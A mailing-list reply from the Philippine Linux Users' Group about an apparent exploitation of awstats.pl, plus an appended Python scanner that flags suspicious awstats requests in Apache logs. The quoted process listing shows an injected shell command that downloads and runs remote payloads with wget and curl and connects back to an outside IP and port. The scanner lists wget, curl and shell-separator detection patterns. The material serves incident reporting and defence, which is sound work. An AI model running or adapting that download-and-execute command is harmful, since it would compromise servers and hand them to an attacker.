On 5/8/06, Kelsey Hartigan Go <[EMAIL PROTECTED]> wrote:
> Any vulnerability in awstats.pl?
> I suddenly have these processes running...
>
> 6086 ? S 0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl
> 6087 ? R 81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 http://219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 3303;done;wget http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo e_exp;%00/awstats.w.x.y.z.conf

What version of awstats are you running?
I'm running the latest one on our server but I haven't encountered
anything similar to your processes.
Even before I set up anything on the server (only Apache running),
there were already some IPs attempting to exploit the system via a
vulnerability in awstats (as well as in horde, xml/rpc, drupal, etc.)
--
Stand before it and there is no beginning.
Follow it and there is no end.
Stay with the ancient Tao,
Move with the present.
_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List
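
An added example, not part of the original thread: a small check that scans Apache access-log lines for awstats.pl requests whose decoded query string carries the markers visible in the process listing above (`b_exp`/`e_exp`, a trailing `%00`, shell separators, `wget`/`curl`). The common/combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache common/combined log: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Indicators drawn from the process listing in the thread, plus shell metacharacters.
SIGNS = {
    "marker": re.compile(r"\b[be]_exp\b"),      # echo b_exp ... echo e_exp wrapper
    "fetch": re.compile(r"\b(wget|curl)\b"),    # download tools in a query string
    "shell_meta": re.compile(r"[;|`]|\$\("),    # command separators / substitution
    "null_byte": re.compile(r"\x00"),           # decoded %00 truncation byte
}

def suspicious_awstats_hits(lines):
    """Return (client, status, reasons) for awstats.pl requests whose
    URL-decoded query string looks like command injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/awstats.pl"):
            continue
        query = unquote_plus(parts.query)
        reasons = sorted(name for name, rx in SIGNS.items() if rx.search(query))
        if reasons:
            hits.append((client, int(status), reasons))
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical parameter "p").
SAMPLE = [
    '192.0.2.10 - - [08/May/2006:10:00:00 +0800] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/May/2006:10:01:00 +0800] "GET /cgi-bin/awstats.pl?p=echo%20%3Becho%20b_exp%3Becho%20e_exp%3B%00 HTTP/1.0" 200 312',
    '198.51.100.7 - - [08/May/2006:10:02:00 +0800] "GET /index.html?q=a;b HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for client, status, reasons in suspicious_awstats_hits(SAMPLE):
        print(client, status, ",".join(reasons))
```

A 200 status on a flagged request only means the CGI answered; whether a shell actually ran has to be confirmed from the process list, as in the listing quoted above.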